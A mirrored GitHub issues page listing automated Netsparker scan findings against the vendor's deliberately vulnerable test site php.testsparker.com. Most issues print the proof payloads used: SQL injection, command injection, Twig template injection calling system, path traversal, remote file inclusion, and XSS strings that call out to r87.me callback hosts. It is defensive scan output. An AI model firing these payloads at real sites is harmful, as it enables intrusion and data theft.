louisianatiger / cloudmigration Goto Github PK
View Code? Open in Web Editor NEWAWS to OCI Cloud Migration
cloudmigration's People
Contributors
Watchers
cloudmigration's Issues
Vulnerability - Remote File Inclusion
URL: http://php.testsparker.com/process.php?file=http://r87.com/n?%00.nsp
Name: Remote File Inclusion
Severity: Critical
Confirmed: True
ParameterName: file
ParameterType: GET
Payload: http://r87.com/n?%00.nsp
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5c0c4b6f4a3c4cfdb6eead640419c9b7
Vulnerability - [Possible] Cross-site Request Forgery
URL: http://php.testsparker.com/nslookup.php
Name: [Possible] Cross-site Request Forgery
Severity: Low
Certainty: 90%
Form Action(s) :
/nslookup.php
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/989020f238e646c9c15cad6404198061
Vulnerability - Missing X-Frame-Options Header
URL: http://php.testsparker.com/
Name: Missing X-Frame-Options Header
Severity: Low
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1aa3824ba0b74fceed32ad6404194548
Vulnerability - Missing X-XSS-Protection Header
URL: http://php.testsparker.com/
Name: Missing X-XSS-Protection Header
Severity: Best Practice
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/45ba456d6e614405edd0ad64041945fe
Vulnerability - Cross-site Scripting
URL: http://php.testsparker.com/artist.php?id=<scRipt>netsparker(0x03EA5C)</scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: <scRipt>netsparker(0x03EA5C)</scRipt>
Proof URL :
http://php.testsparker.com/artist.php?id=%3cscRipt%3ealert(0x03EA5C)%3c%2fscRipt%3e
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a4bd4f2e58d14c794b1dad64041a9435
Vulnerability - Robots.txt Detected
URL: http://php.testsparker.com/robots.txt
Name: Robots.txt Detected
Severity: Information
Confirmed: True
Interesting Robots.txt Entries :
Disallow: /
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/04694a760ed34d1326f9ad640420ebe7
Vulnerability - Out-of-date Version (PHP)
URL: http://php.testsparker.com/
Name: Out-of-date Version (PHP)
Severity: Critical
Certainty: 90%
Identified Version :
5.2.6
Latest Version :
8.0.8
Vulnerability Database :
Result is based on 07/14/2021 15:00:00 vulnerability database content.
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/e11aceb9b6224c24e020ad6404194320
Vulnerability - Programming Error Message
URL: http://php.testsparker.com/hello.php?name=Visitor
Name: Programming Error Message
Severity: Low
Certainty: 90%
Page Type :
Other
Identified Error Message :
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(26) : eval()'d code</b> on line <b>1</b>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/9445d2722423487b8461ad64041970a3
Vulnerability - Unexpected Redirect Response Body (Too Large)
URL: http://php.testsparker.com/auth/?nsextt=367126'"250821
Name: Unexpected Redirect Response Body (Too Large)
Severity: Information
Certainty: 70%
ParameterName: nsextt
ParameterType: GET
Payload: 367126'"250821
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2764218b3a614424ef92ad72036f5d3c
Vulnerability - PHP allow_url_include Is Enabled
URL: http://php.testsparker.com/
Name: PHP allow_url_include Is Enabled
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/88126299ce474cc57c62ad72036f4183
Vulnerability - Content Security Policy (CSP) Not Implemented
URL: http://php.testsparker.com/
Name: Content Security Policy (CSP) Not Implemented
Severity: Best Practice
Certainty: 100%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7df3aa3587ad4984ee92ad64041946e3
Vulnerability - Blind Cross-site Scripting
URL: http://php.testsparker.com/artist.php?id=<iMg src=N onerror="this.onerror='';this.src='//jlcxsvyefhxerweikvxyafvqhvfo4sasdner3uxj'+'myw.r87.me/r/?'+location.href">
Name: Blind Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: id
ParameterType: GET
Payload:
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/8aa9df0f1ea64f589ba2ad64041daabf
Vulnerability - Boolean Based SQL Injection
URL: http://php.testsparker.com/artist.php?id=-1 OR 17-7=10
Name: Boolean Based SQL Injection
Severity: Critical
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: -1 OR 17-7=10
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/43519d9c20d5402097a0ad64041da994
Vulnerability - Version Disclosure (Apache)
URL: http://php.testsparker.com/
Name: Version Disclosure (Apache)
Severity: Low
Certainty: 90%
Page Type :
Other
Extracted Version :
2.2.8
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5e98feefe6a74fc7dd33ad64041942ab
Vulnerability - Code Evaluation (PHP) - IAST
URL: http://php.testsparker.com/hello.php?name=INJECTIONSTART'"*/
<?phpINJECTIONEND
Name: Code Evaluation (PHP) - IAST
Severity: Critical
Confirmed: True
ParameterName: name
ParameterType: GET
Payload: INJECTIONSTART'"*/
Vulnerability - Local File Inclusion
URL: http://php.testsparker.com/process.php?file=/../../../../../../../../../../windows/win.ini%00.nsp
Name: Local File Inclusion
Severity: High
Confirmed: True
ParameterName: file
ParameterType: GET
Payload: /../../../../../../../../../../windows/win.ini%00.nsp
[IAST] Source File :
C:/AppServ/www/process.php on line 25
[IAST] Extra Information :
"include" was called. Payload: /../../../../../../../../../../windows/win.ini�.nsp
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/131f1de5ce8f4000a99dad640419c516
Netsparker Enterprise Test Issue
This issue was created by Netsparker Enterprise to make sure that the integration settings are working properly.
Vulnerability - SSL/TLS Not Implemented
URL: https://php.testsparker.com/
Name: SSL/TLS Not Implemented
Severity: Medium
Certainty: 100%
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/88d505b47945488b01c9ad6404194c9d
Vulnerability - PHP register_globals Is Enabled
URL: http://php.testsparker.com/
Name: PHP register_globals Is Enabled
Severity: Medium
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a0ac944789e04dcf7689ad72036f3f4d
Vulnerability - Version Disclosure (PHP)
URL: http://php.testsparker.com/
Name: Version Disclosure (PHP)
Severity: Low
Certainty: 90%
Page Type :
Other
Extracted Version :
5.2.6
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2ebdeeff17fd4d8de558ad64041943d6
Vulnerability - Command Injection
URL: http://php.testsparker.com/nslookup.php
Name: Command Injection
Severity: Critical
Confirmed: True
ParameterName: param
ParameterType: POST
Payload: '& SET /A 0xFFF9999-35832 &
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2c4ff74d23dc459654d3ad64041b8710
Vulnerability - Forbidden Resource
URL: http://php.testsparker.com/c:/boot.ini
Name: Forbidden Resource
Severity: Information
Confirmed: True
ParameterName: URI-BASED
ParameterType: Full URL
Payload: c:\boot.ini
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/c36e6652976e496e395cad6404195e5a
Vulnerability - Code Execution via SSTI (PHP Twig)
URL: http://php.testsparker.com/artist.php?id={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}
Name: Code Execution via SSTI (PHP Twig)
Severity: Critical
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a6130f4da4f047fc1a28ad64041a8564
Vulnerability - Subresource Integrity (SRI) Not Implemented
URL: http://php.testsparker.com/products.php?pro=hTTp://r87.com/n
Name: Subresource Integrity (SRI) Not Implemented
Severity: Best Practice
Certainty: 100%
ParameterName: pro
ParameterType: GET
Payload: hTTp://r87.com/n
Identified Sub Resource(s) :
http://r87.com/n
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1ccb674ac07d4205aa59ad64041a19c7
Vulnerability - Email Address Disclosure
URL: http://php.testsparker.com/process.php?file=Generics/contact.nsp
Name: Email Address Disclosure
Severity: Information
Certainty: 95%
Email Address(es) :
[email protected]
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1d6df94cc3074397b060ad6404197c63
Vulnerability - Database Error Message Disclosure
URL: http://php.testsparker.com/artist.php?id=1ACUSTARTFILE/../../xxx\..\..\ACUENDFILE
Name: Database Error Message Disclosure
Severity: Low
Certainty: 40%
ParameterName: id
ParameterType: GET
Payload: 1ACUSTARTFILE/../../xxx....\ACUENDFILE
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1b622827ceef4a6bd848ad720370c7e7
Vulnerability - SQL Injection (IAST)
URL: http://php.testsparker.com/artist.php?id=482810 434075
Name: SQL Injection (IAST)
Severity: Critical
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: 482810 434075
[IAST] Source File :
C:/AppServ/www/Programmatic/mysqlCall.php on line 89
[IAST] Extra Information :
"mysql_query" was called.
Stack trace:
- mysqlCallClassicWith2Groups([string] "482810 434075", [string] "numeric", [string] "SQS") Payload: SELECT * FROM actor WHERE ((actor_id = 482810 434075 ));
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/631e17a592724ecf0fa9ad720370d64f
Vulnerability - Referrer-Policy Not Implemented
URL: http://php.testsparker.com/
Name: Referrer-Policy Not Implemented
Severity: Best Practice
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5c01290b246f4cbef428ad640419479d
Vulnerability - SameSite Cookie Not Implemented
URL: http://php.testsparker.com/auth/internal.php
Name: SameSite Cookie Not Implemented
Severity: Best Practice
Certainty: 100%
Identified Cookie(s) :
PHPSESSID
Cookie Source :
HTTP Header
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1d90ee2b561e40304784ad640419184e
Vulnerability - [Possible] Internal IP Address Disclosure
URL: http://php.testsparker.com/nslookup.php
Name: [Possible] Internal IP Address Disclosure
Severity: Low
Certainty: 50%
Page Type :
Other
Extracted IP Address(es) :
172.30.0.2
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/39dcdaf40d9e4d5c3ffcad640419a657
Vulnerability - Open Silverlight Client Access Policy
URL: http://php.testsparker.com/clientaccesspolicy.xml
Name: Open Silverlight Client Access Policy
Severity: Medium
Confirmed: True
Policy Rules :
*
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/b37280cb056f427de1edad640420d801
Vulnerability - Blind Cross-site Scripting
URL: http://php.testsparker.com/auth/xss.php
Name: Blind Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: search
ParameterType: POST
Payload:
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2d3adcb5880a4cef9cf0ad64041dab1d
Vulnerability - Frame Injection
URL: http://php.testsparker.com/artist.php?id=<iframe src="http://r87.com/?"></iframe>
Name: Frame Injection
Severity: Medium
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: <iframe src="http://r87.com/?"></iframe>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/0bcecec3914e469fcb8aad64041abf56
Vulnerability - Out-of-date Version (Apache)
URL: http://php.testsparker.com/
Name: Out-of-date Version (Apache)
Severity: Critical
Certainty: 90%
Identified Version :
2.2.8
Latest Version :
2.4.48
Vulnerability Database :
Result is based on 07/14/2021 15:00:00 vulnerability database content.
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/16a14807d1474554dd22ad6404194240
Vulnerability - Cookie Not Marked as HttpOnly
URL: http://php.testsparker.com/auth/internal.php
Name: Cookie Not Marked as HttpOnly
Severity: Low
Confirmed: True
Identified Cookie(s) :
PHPSESSID
Cookie Source :
HTTP Header
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/8bf52b74f184411f46ecad640419179c
Vulnerability - PHP allow_url_fopen Is Enabled
URL: http://php.testsparker.com/
Name: PHP allow_url_fopen Is Enabled
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/489544a019e84d087a69ad72036f4059
Vulnerability - SVN Detected
URL: http://php.testsparker.com/.svn/all-wcprops
Name: SVN Detected
Severity: High
Confirmed: True
ParameterName: URI-BASED
ParameterType: Full URL
Payload: .svn/all-wcprops
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/03301254c9b248b73af7ad6404196075
Vulnerability - TRACE/TRACK Method Detected
URL: http://php.testsparker.com/
Name: TRACE/TRACK Method Detected
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5a35064894604e773753ad6404195d12
Vulnerability - Directory Listing (Apache)
URL: http://php.testsparker.com/auth/images/
Name: Directory Listing (Apache)
Severity: Information
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/09379edaab574de92d2cad640419a175
Vulnerability - OPTIONS Method Enabled
URL: http://php.testsparker.com/images/
Name: OPTIONS Method Enabled
Severity: Information
Confirmed: True
Allowed methods :
GET, HEAD, POST, OPTIONS, TRACE
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1e27deef28b24f8f9f3ead6404256beb
Vulnerability - Apache Web Server Identified
URL: http://php.testsparker.com/
Name: Apache Web Server Identified
Severity: Information
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/e86133003b0b4afbea3cad6404194464
Vulnerability - Out of Band Code Evaluation (PHP)
URL: http://php.testsparker.com/hello.php?name=+gethostbyname(trim('jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq'.'31m.r87.me'));//
Name: Out of Band Code Evaluation (PHP)
Severity: Critical
Confirmed: True
ParameterName: name
ParameterType: GET
Payload: +gethostbyname(trim('jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq'.'31m.r87.me'));//
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/126def9424c74bfc986aad64041daa17
Vulnerability - Insecure Frame (External)
URL: http://php.testsparker.com/process.php?file=Generics/contact.nsp
Name: Insecure Frame (External)
Severity: Low
Confirmed: True
Frame Source(s) :
http://maps.google.com/maps?q=mavituna+security&output=embed
Parsing Source :
DOM Parser
Page Type :
Contact
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/69c0e36cd1f24e21c471ad6404198169
Vulnerability - PHP display_errors Is Enabled
URL: http://php.testsparker.com/
Name: PHP display_errors Is Enabled
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/36fe7ff01f1740267469ad72036f3df0
Vulnerability - Internal Server Error
URL: http://php.testsparker.com/artist.php?id=%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-87309)}
Name: Internal Server Error
Severity: Low
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-87309)}
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7ec08207d11645ba02aaad64041a7da0
Vulnerability - [Possible] Blind Cross-site Scripting
URL: http://php.testsparker.com/products.php?pro='"--></style></scRipt><scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg.r87.me"></scRipt>
Name: [Possible] Blind Cross-site Scripting
Severity: High
Certainty: 70%
ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg.r87.me"></scRipt>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7d9c50fdef9e40199a20ad64041daa64
Vulnerability - Open Policy Crossdomain.xml Detected
URL: http://php.testsparker.com/crossdomain.xml
Name: Open Policy Crossdomain.xml Detected
Severity: Medium
Confirmed: True
Policy Rules :
<allow-access-from domain="*" />
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/c5dc79bf862e44a9d82ead640420d424
Vulnerability - Cross-site Scripting
URL: http://php.testsparker.com/products.php?pro='"--></style></scRipt><scRipt>netsparker(0x03E6FE)</scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt>netsparker(0x03E6FE)</scRipt>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2eedc35206524f24e103ad64041a7904
Vulnerability - [Possible] Internal Path Disclosure (Windows)
URL: http://php.testsparker.com/hello.php?name=Visitor
Name: [Possible] Internal Path Disclosure (Windows)
Severity: Information
Certainty: 75%
Page Type :
Other
Identified Internal Path(s) :
C:\AppServ\www\hello.php
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/094c787ca6374ad784b3ad6404197184
Vulnerability - Apache MultiViews Enabled
URL: http://php.testsparker.com/auth/style
Name: Apache MultiViews Enabled
Severity: Low
Certainty: 90%
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/3a2be832a9954abe306cad640419589a
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.